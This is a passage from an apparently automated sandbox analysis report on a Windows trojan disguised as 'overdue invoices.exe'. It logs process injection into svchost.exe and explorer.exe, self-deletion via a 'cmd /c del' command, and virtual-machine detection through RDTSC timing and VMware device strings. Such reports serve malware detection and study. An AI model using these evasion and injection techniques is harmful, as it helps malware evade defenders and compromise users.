          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369520 NtWaitForSingleObject,11_2_03369520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369560 NtWriteFile,11_2_03369560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369950 NtQueueApcThread,11_2_03369950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033695F0 NtQueryInformationFile,11_2_033695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033699D0 NtCreateProcessEx,11_2_033699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03369820 NtEnumerateKey,11_2_03369820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336B040 NtSuspendThread,11_2_0336B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033698A0 NtWriteVirtualMemory,11_2_033698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033698F0 NtReadVirtualMemory,11_2_033698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A8690 NtReadFile,11_2_029A8690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A87C0 NtAllocateVirtualMemory,11_2_029A87C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A8710 NtClose,11_2_029A8710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A85E0 NtCreateFile,11_2_029A85E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A868B NtReadFile,11_2_029A868B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A87BA NtAllocateVirtualMemory,11_2_029A87BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A870A NtClose,11_2_029A870A
          Source: overdue invoices.exe, 00000000.00000003.350178053.000000001AF7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs overdue invoices.exe
          Source: overdue invoices.exe, 00000000.00000003.348670108.000000001ADE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs overdue invoices.exe
          Source: overdue invoices.exe, 00000001.00000002.444822691.0000000000C1F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs overdue invoices.exe
          Source: overdue invoices.exe, 00000001.00000002.445849303.0000000002AAB000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs overdue invoices.exe
          Source: overdue invoices.exe, 00000001.00000002.444112961.0000000000A8F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs overdue invoices.exe
          Source: overdue invoices.exeVirustotal: Detection: 35%
          Source: overdue invoices.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\overdue invoices.exeFile read: C:\Users\user\Desktop\overdue invoices.exeJump to behavior
          Source: overdue invoices.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\overdue invoices.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\overdue invoices.exe "C:\Users\user\Desktop\overdue invoices.exe"
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Users\user\Desktop\overdue invoices.exe "C:\Users\user\Desktop\overdue invoices.exe"
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\overdue invoices.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Users\user\Desktop\overdue invoices.exe "C:\Users\user\Desktop\overdue invoices.exe" Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\overdue invoices.exe"Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.dbJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeFile created: C:\Users\user\AppData\Local\Temp\nse4640.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@0/1
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\overdue invoices.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: wntdll.pdbUGP source: overdue invoices.exe, 00000000.00000003.349969071.000000001AE60000.00000004.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000000.00000003.347174579.000000001ACD0000.00000004.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.444112961.0000000000A8F000.00000040.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.442747025.0000000002F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.444455468.0000000003100000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: overdue invoices.exe, overdue invoices.exe, 00000001.00000002.444112961.0000000000A8F000.00000040.00000800.00020000.00000000.sdmp, overdue invoices.exe, 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.442747025.0000000002F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.444455468.0000000003100000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: overdue invoices.exe, 00000001.00000002.445807622.0000000002AA0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: overdue invoices.exe, 00000001.00000002.445807622.0000000002AA0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041B822 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041B82B push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041B88C push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041608F push eax; retf 1_2_00416093
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0040DAFB push cs; ret 1_2_0040DAFC
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041544B push ecx; ret 1_2_0041544C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00415D51 push ebx; ret 1_2_00415DFE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004015D1 push es; retf 1_2_004015D3
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00415DEB push ebx; ret 1_2_00415DFE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00406EF8 push ebp; ret 1_2_00406EF9
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_0041B7D5 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009ED0D1 push ecx; ret 1_2_009ED0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0337D0D1 push ecx; ret 11_2_0337D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0299DAFB push cs; ret 11_2_0299DAFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AC37B pushad ; iretd 11_2_029AC37C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A608F push eax; retf 11_2_029A6093
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AB88C push eax; ret 11_2_029AB892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AB82B push eax; ret 11_2_029AB892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AB822 push eax; ret 11_2_029AB828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02996EF8 push ebp; ret 11_2_02996EF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029AB7D5 push eax; ret 11_2_029AB828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A544B push ecx; ret 11_2_029A544C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029915D1 push es; retf 11_2_029915D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A5DEB push ebx; ret 11_2_029A5DFE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_029A5D51 push ebx; ret 11_2_029A5DFE
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\overdue invoices.exeFile created: C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del "C:\Users\user\Desktop\overdue invoices.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del "C:\Users\user\Desktop\overdue invoices.exe"Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\overdue invoices.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\overdue invoices.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002998604 second address: 000000000299860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000299899E second address: 00000000029989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\overdue invoices.exeAPI call chain: ExitProcess graph end nodegraph_0-3221
          Source: C:\Users\user\Desktop\overdue invoices.exeAPI call chain: ExitProcess graph end nodegraph_0-3225
          Source: explorer.exe, 00000014.00000000.613974368.00000000079AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000014.00000000.589957774.0000000007905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000014.00000003.591040239.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000-2
          Source: explorer.exe, 00000014.00000003.592267219.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\ewyF
          Source: explorer.exe, 00000014.00000003.592267219.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 00000014.00000003.591040239.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b})
          Source: explorer.exe, 00000014.00000000.613974368.00000000079AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00hg
          Source: explorer.exe, 00000014.00000003.601176074.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}k
          Source: explorer.exe, 00000005.00000000.362046790.00000000062E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.592267219.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000014.00000000.613974368.00000000079AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000014.00000000.608855089.00000000066C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.592267219.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\F8
          Source: explorer.exe, 00000014.00000003.597780988.0000000007AA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Users
          Source: explorer.exe, 00000014.00000003.592267219.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}fbFd
          Source: explorer.exe, 00000014.00000003.601176074.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F{
          Source: explorer.exe, 00000014.00000003.597780988.0000000007AA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ocalStateF
          Source: explorer.exe, 00000005.00000000.362046790.00000000062E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.577024843.0000000007945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.365496291.00000000083EB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000014.00000003.577024843.0000000007945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000014.00000000.604273347.00000000007F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000J
          Source: explorer.exe, 00000005.00000000.396732361.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.358496489.000000000461E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.375653244.00000000045BE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000005.00000000.396732361.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.383000637.0000000008430000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.371882109.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000014.00000003.601176074.0000000007974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}s
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]1_2_00999080
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]1_2_009D90AF
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
